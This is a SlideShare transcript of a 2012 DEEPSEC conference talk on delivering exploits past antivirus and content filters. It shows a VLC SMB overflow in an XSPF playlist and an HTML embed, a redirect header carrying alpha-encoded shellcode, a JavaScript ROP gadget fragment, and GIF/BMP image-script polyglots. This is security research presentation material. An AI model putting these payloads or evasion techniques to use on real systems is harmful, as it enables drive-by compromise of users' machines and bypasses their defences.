When Bad Things Come In Good Packages

8,746 views

Published on

My DEEPSEC 2012 talk explores the fine art of packaging when it comes to exploits. No this is not another talk about packers or crypters. We are talking STYLE! A successful exploit is one that is innovatively delivered, in style. We shall be talking about a number of sneaky, funny and innovative techniques for delivering exploits to their doorsteps without annoyances like anti-virus or content filtering getting in the way.

This talk goes beyond the obvious obfuscation. We combine the power of web hacking, the power of sophisticated exploit development and goofball creativity to ensure that exploits get delivered and detonate on time, as planned. Did you know you can literally paint an exploit on canvas? Have you heard of chameleon Javascript? This and more in the talk!

Published in: Technology
1 Comment
4 Likes
Statistics
Notes
No Downloads
Views
Total views
8,746
On SlideShare
0
From Embeds
0
Number of Embeds
134
Actions
Shares
0
Downloads
0
Comments
1
Likes
4
Embeds 0
No embeds

No notes for slide

When Bad Things Come In Good Packages

  1. when Bad Things come in Good packages Saumil Shahnet-square DEEPSEC 2012
  2. # who am iSaumil Shah, CEO Net-Square.•  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.•  M.S. Computer Science Purdue University.•  saumil@net-square.com•  LinkedIn: saumilshah•  Twitter: @therealsaumilnet-square
  3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference Conference "Eyes and Speaker Trainer ears open"net-square
  4. When two forces combine... Web Binary Hacking Exploitsnet-square
  5. SNEAKY LETHALnet-square
  6. net-square
  7. 302 IMG JS HTML5net-square
  8. net-square
  9. VLC smb overflow•  smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....}•  Classic Stack Overflow.net-square
  10. VLC XSPF file<?xml version="1.0" encoding="UTF-8"?>!<playlist version="1"! xmlns="http://xspf.org/ns/0/"! xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">! <title>Playlist</title>! <trackList>! <track>! <location>! smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}! </location>! <extension! application="http://www.videolan.org/vlc/playlist/0">! <vlc:id>0</vlc:id>! </extension>! </track>! </trackList>!</playlist>! net-square
  11. Alpha Encoded Tiny ZOMFG! Exploit URLnet-square
  12. 100% Pure Alphanum!net-square
  13. VLC smb overflow - HTMLized!! "<embed type="application/x-vlc-plugin"! " "width="320" height="200"! " "target="http://tinyurl.com/ycctrzf"! " "id="vlc" />!net-square
  14. 301 Redirect from tinyurlHTTP/1.1 301 Moved Permanently!X-Powered-By: PHP/5.2.12!Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1!JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII!IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL!KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk!PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH!kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn!CUCHPeEPAA}!Content-type: text/html!Content-Length: 0!Connection: close!Server: TinyURL/1.6! net-square
  15. net-square
  16. Exploits as Images - 1•  Grayscale encoding (0-255).•  1 pixel = 1 character.•  Perfectly valid image.•  Decode and Execute!net-square
  17. net-square
  18. Im an evil Javascript Im an innocent imagenet-square
  19. function packv(n) {var s=new Number(n).toStri ng(16);while(s.l return(unescape( ength<8)s="0"+s; "%u"+s.substring string(0,4)))}va (4,8)+"%u"+s.sub r addressof=new Array();addresso f["ropnop"]=0x6d ["xchg_eax_esp_r 81bdf0;addressof et"]=0x6d81bdef; ax_ret"]=0x6d906 addressof["pop_e 744;addressof["p d81cd57;addresso op_ecx_ret"]=0x6 f["mov_peax_ecx_ ;addressof["mov_ ret"]=0x6d979720 eax_pecx_ret"]=0 sof["mov_pecx_ea x6d8d7be0;addres x_ret"]=0x6d8eee c_eax_ret"]=0x6d 01;addressof["in 838f54;addressof ]=0x00000000;add ["add_eax_4_ret" ressof["call_pea 31;addressof["ad x_ret"]=0x6d8aec d_esp_24_ret"]=0 sof["popad_ret"] x00000000;addres =0x6d82a8a1;addr "]=0x6d802597;fu essof["call_peax nction call_ntallocatev irtualmemory(bas m){var ropnop=pac eptr,size,callnu kv(addressof["ro pop_eax_ret=pack pnop"]);var v(addressof["pop pop_ecx_ret=pack _eax_ret"]);var v(addressof["pop mov_peax_ecx_ret _ecx_ret"]);var =packv(addressof et"]);var ["mov_peax_ecx_r mov_eax_pecx_ret =packv(addressof et"]);var ["mov_eax_pecx_r mov_pecx_eax_ret =packv(addressof et"]);var ["mov_pecx_eax_r call_peax_ret=pa ckv(addressof["c var all_peax_ret"]); add_esp_24_ret=p ackv(addressof[" );var add_esp_24_ret"] popad_ret=packv( addressof["popad retval=""! _ret"]);var <CANVAS>net-square
  20. net-square See no eval()
  21. Same Same No Different! var a = eval(str); a = (new Function(str))();net-square
  22. IMAJSnet-square I iz being a Javascript
  23. IMAJS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>net-square
  24. IMAJS-GIF Browser SupportHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera ? ?2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -net-square
  25. IMAJS-BMP Browser SupportHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -net-square
  26. The αq Exploitnet-square
  27. Demo IMAJS αq FTW!net-square
  28. Alpha encoded exploit code IMAJS CANVAS "loader" scriptnet-square
  29. These are not the sploitsyoure looking for net-square
  30. No virus threat detectednet-square
  31. The FUTURE?net-square
  32. when Bad Things come inGood packagesTHE END@therealsaumilsaumil@net-square.com net-square

×